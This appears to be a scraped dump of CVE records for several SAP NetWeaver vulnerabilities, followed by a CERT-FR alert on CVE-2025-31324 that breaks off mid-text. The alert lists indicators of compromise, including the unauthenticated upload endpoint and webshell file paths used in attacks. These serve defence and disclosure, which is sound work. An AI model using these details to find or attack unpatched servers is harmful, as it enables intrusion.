"x_transferred"
],
"url": "https://me.sap.com/notes/3425682"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "netweaver",
"vendor": "sap",
"versions": [
{
"status": "affected",
"version": "7.5"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-25644",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T17:39:57.790456Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-05T17:43:45.543Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "NetWeaver (WSRM)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUnder certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.\u003c/p\u003e"
}
],
"value": "Under certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-732",
"description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-28T22:24:11.195Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3425682"
},
{
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Information Disclosure vulnerability in NetWeaver (WSRM)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2024-25644",
"datePublished": "2024-03-12T00:33:44.473Z",
"dateReserved": "2024-02-09T04:10:20.036Z",
"dateUpdated": "2024-09-28T22:24:11.195Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-42968 (GCVE-0-2025-42968)
Vulnerability from nvd – Published: 2025-07-08 00:36 – Updated: 2025-07-08 16:13
VLAI?
Summary
SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.
Severity ?
5 (Medium)
CWE
- CWE-862 - Missing Authorization
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver (RFC enabled function module) |
Affected:
SAP_BW 700
Affected: 701 Affected: 702 Affected: 710 Affected: 731 Affected: 740 Affected: 750 Affected: 751 Affected: 752 Affected: 753 Affected: 754 Affected: 755 Affected: 756 Affected: 757 Affected: 758 Affected: 816 Affected: 914 Affected: 916 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-42968",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-08T14:29:01.927973Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T16:13:36.672Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (RFC enabled function module)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "SAP_BW 700"
},
{
"status": "affected",
"version": "701"
},
{
"status": "affected",
"version": "702"
},
{
"status": "affected",
"version": "710"
},
{
"status": "affected",
"version": "731"
},
{
"status": "affected",
"version": "740"
},
{
"status": "affected",
"version": "750"
},
{
"status": "affected",
"version": "751"
},
{
"status": "affected",
"version": "752"
},
{
"status": "affected",
"version": "753"
},
{
"status": "affected",
"version": "754"
},
{
"status": "affected",
"version": "755"
},
{
"status": "affected",
"version": "756"
},
{
"status": "affected",
"version": "757"
},
{
"status": "affected",
"version": "758"
},
{
"status": "affected",
"version": "816"
},
{
"status": "affected",
"version": "914"
},
{
"status": "affected",
"version": "916"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-862",
"description": "CWE-862: Missing Authorization",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T00:36:31.953Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3621037"
},
{
"url": "https://url.sap/sapsecuritypatchday"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Missing Authorization check in SAP NetWeaver (RFC enabled function module)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2025-42968",
"datePublished": "2025-07-08T00:36:31.953Z",
"dateReserved": "2025-04-16T13:25:42.158Z",
"dateUpdated": "2025-07-08T16:13:36.672Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-42999 (GCVE-0-2025-42999)
Vulnerability from nvd – Published: 2025-05-13 00:17 – Updated: 2025-10-21 22:55
VLAI?
Summary
SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.
Severity ?
9.1 (Critical)
CWE
- CWE-502 - Deserialization of Untrusted Data
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver (Visual Composer development server) |
Affected:
VCFRAMEWORK 7.50
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-42999",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-17T03:55:58.995900Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-05-15",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T22:55:16.662Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-05-15T00:00:00+00:00",
"value": "CVE-2025-42999 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-05-13T16:29:26.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Visual Composer development server)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "VCFRAMEWORK 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-13T01:38:43.612Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3604119"
},
{
"url": "https://url.sap/sapsecuritypatchday"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Insecure Deserialization in SAP NetWeaver (Visual Composer development server)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2025-42999",
"datePublished": "2025-05-13T00:17:43.710Z",
"dateReserved": "2025-04-16T13:25:50.942Z",
"dateUpdated": "2025-10-21T22:55:16.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31324 (GCVE-0-2025-31324)
Vulnerability from nvd – Published: 2025-04-24 16:50 – Updated: 2025-10-21 22:55
VLAI?
Summary
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
Severity ?
10 (Critical)
CWE
- CWE-434 - Unrestricted Upload of File with Dangerous Type
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver (Visual Composer development server) |
Affected:
VCFRAMEWORK 7.50
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31324",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-30T03:56:21.966706Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-04-29",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T22:55:17.980Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"technical-description"
],
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
},
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-04-29T00:00:00+00:00",
"value": "CVE-2025-31324 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-05-02T17:13:30.650Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://www.theregister.com/2025/04/25/sap_netweaver_patch/"
},
{
"url": "https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/"
},
{
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Visual Composer development server)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "VCFRAMEWORK 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T16:50:27.706Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3594142"
},
{
"url": "https://url.sap/sapsecuritypatchday"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Missing Authorization check in SAP NetWeaver (Visual Composer development server)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2025-31324",
"datePublished": "2025-04-24T16:50:27.706Z",
"dateReserved": "2025-03-27T23:02:06.906Z",
"dateUpdated": "2025-10-21T22:55:17.980Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27898 (GCVE-0-2024-27898)
Vulnerability from nvd – Published: 2024-04-09 00:52 – Updated: 2024-08-21 15:07
VLAI?
Summary
SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.
Severity ?
5.3 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver |
Affected:
7.50
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:41:55.785Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://me.sap.com/notes/3425188"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "netweaver",
"vendor": "sap",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27898",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-21T15:05:55.533542Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-21T15:07:15.427Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-09T00:52:54.390Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3425188"
},
{
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Server-Side Request Forgery in SAP NetWeaver",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2024-27898",
"datePublished": "2024-04-09T00:52:54.390Z",
"dateReserved": "2024-02-27T06:26:16.786Z",
"dateUpdated": "2024-08-21T15:07:15.427Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-25644 (GCVE-0-2024-25644)
Vulnerability from nvd – Published: 2024-03-12 00:33 – Updated: 2024-09-28 22:24
VLAI?
Summary
Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.
Severity ?
5.3 (Medium)
CWE
- CWE-732 - Incorrect Permission Assignment for Critical Resource
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | NetWeaver (WSRM) |
Affected:
7.50
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:44:09.806Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://me.sap.com/notes/3425682"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "netweaver",
"vendor": "sap",
"versions": [
{
"status": "affected",
"version": "7.5"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-25644",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T17:39:57.790456Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-05T17:43:45.543Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "NetWeaver (WSRM)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUnder certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.\u003c/p\u003e"
}
],
"value": "Under certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-732",
"description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-28T22:24:11.195Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3425682"
},
{
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Information Disclosure vulnerability in NetWeaver (WSRM)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2024-25644",
"datePublished": "2024-03-12T00:33:44.473Z",
"dateReserved": "2024-02-09T04:10:20.036Z",
"dateUpdated": "2024-09-28T22:24:11.195Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CERTFR-2025-ALE-005
Vulnerability from certfr_alerte - Published: - Updated:
Le 24 avril 2025, SAP a publié un bulletin de sécurité relatif à la vulnérabilité CVE-2025-31324 qui permet l'exécution de code arbitraire à distance pour un utilisateur non authentifié. Cette vulnérabilité est provoquée par un contournement de la politique de sécurité qui permet de télécharger des fichiers arbitraires et potentiellement exécutables sur le serveur. Elle impacte le composant Visual Composer development server, non installé par défaut mais fréquemment utilisé.
Le CERT-FR a connaissance de plusieurs compromissions liées à cette vulnérabilité.
L'accès aux détails complets concernant cette vulnérabilité ([1] [2]) nécessite un compte utilisateur pour le support SAP. Le bulletin de sécurité du 8 avril 2025 a été mis à jour pour indiquer cette nouvelle vulnérabilité sans faire mention de son exploitation active.
Identification du composant vulnérable
Il est possible de vérifier que le composant vulnérable Visual Composer development server est activé au travers de l'URL http://hote:port/nwa/sysinfo et de chercher la présence du composant VISUAL COMPOSER FRAMEWORK (VCFRAMEWORK.SCA ou VCFRAMEWORK). Si la ligne indique NO, le composant n'est pas installé.
Solutions
Avant d'appliquer le correctif de sécurité, il est nécessaire de vérifier qu'aucun fichier avec l'extension jsp, java ou class n'est présent dans les dossiers suivants :
* C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
* C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
* C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
De plus, il est nécessaire de vérifier dans les journaux du serveur web :
* des accès à l'URL /developmentserver/metadatauploader via une requête POST avec un code HTTP 200 sans authentification ;
* des accès aux URL de la forme /irj/helper.jsp, /irj/cache.jsp ou /irj/\w{8}.jsp[3].
Enfin il est possible de consulter [4] pour d'autres indicateurs de compromission. Note : Ces indicateurs n'ont pas été qualifiés par le CERT-FR.
Si des fichiers malveillants ou des journaux suspects sont présents :
* signaler l’événement auprès du CERT-FR en mettant en copie vos éventuels CSIRTs métier et consulter les bons réflexes en cas d'intrusion sur votre système d'information [5] ;
* isoler totalement la machine concernée du réseau, vis-à-vis d'Internet comme du réseau interne, afin de limiter les risques de latéralisation ;
* en cas d'utilisation d'une appliance virtuelle, réaliser un instantané du système de fichier et de la mémoire vive ;
* si possible, éviter d'éteindre la machine afin de conserver les traces nécessaires aux investigations ;
* mettre sous séquestre les journaux collectés.
Les correctifs pour le composant Visual Composer Framework 7.50 sont listés et disponibles dans le bulletin de sécurité 3594142 de l'éditeur.
Des mesures de contournements sont proposées par l'éditeur [1].
Impacted products
References
| Title | Publication Time | Tags | |
|---|---|---|---|
|
|
|||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "NetWeaver (Visual Composer development server) versions VCFRAMEWORK 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "NetWeaver",
"vendor": {
"name": "SAP",
"scada": false
}
}
}
],
"affected_systems_content": "",
"closed_at": "2025-06-24",
"content": "## Identification du composant vuln\u00e9rable \n\nIl est possible de v\u00e9rifier que le composant vuln\u00e9rable Visual Composer development server est activ\u00e9 au travers de l\u0027URL `http://hote:port/nwa/sysinfo` et de chercher la pr\u00e9sence du composant `VISUAL COMPOSER FRAMEWORK` (`VCFRAMEWORK.SCA` ou `VCFRAMEWORK`). Si la ligne indique `NO`, le composant n\u0027est pas install\u00e9.\n\n## Solutions\n\nAvant d\u0027appliquer le correctif de s\u00e9curit\u00e9, il est n\u00e9cessaire de v\u00e9rifier qu\u0027aucun fichier avec l\u0027extension `jsp`, `java` ou `class` n\u0027est pr\u00e9sent dans les dossiers suivants :\n* `C:\\usr\\sap\\\u003cSID\u003e\\\u003cInstanceID\u003e\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root`\n* `C:\\usr\\sap\\\u003cSID\u003e\\\u003cInstanceID\u003e\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work`\n* `C:\\usr\\sap\\\u003cSID\u003e\\\u003cInstanceID\u003e\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work\\sync`\n\nDe plus, il est n\u00e9cessaire de v\u00e9rifier dans les journaux du serveur web : \n* des acc\u00e8s \u00e0 l\u0027URL `/developmentserver/metadatauploader` via une requ\u00eate POST avec un code HTTP 200 sans authentification ;\n* des acc\u00e8s aux URL de la forme `/irj/helper.jsp`, `/irj/cache.jsp` ou `/irj/\\w{8}.jsp`[3].\n\nEnfin il est possible de consulter [4] pour d\u0027autres indicateurs de compromission. *Note : Ces indicateurs n\u0027ont pas \u00e9t\u00e9 qualifi\u00e9s par 